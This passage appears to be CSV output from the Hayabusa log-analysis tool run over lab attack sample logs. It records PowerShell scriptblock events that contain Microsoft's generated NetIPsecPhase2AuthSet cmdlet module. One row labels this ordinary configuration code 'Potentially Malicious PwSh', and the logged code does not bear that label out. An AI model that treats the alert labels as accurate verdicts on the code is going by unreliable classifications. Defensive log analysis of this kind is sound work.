[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, 
$script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and 
(@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
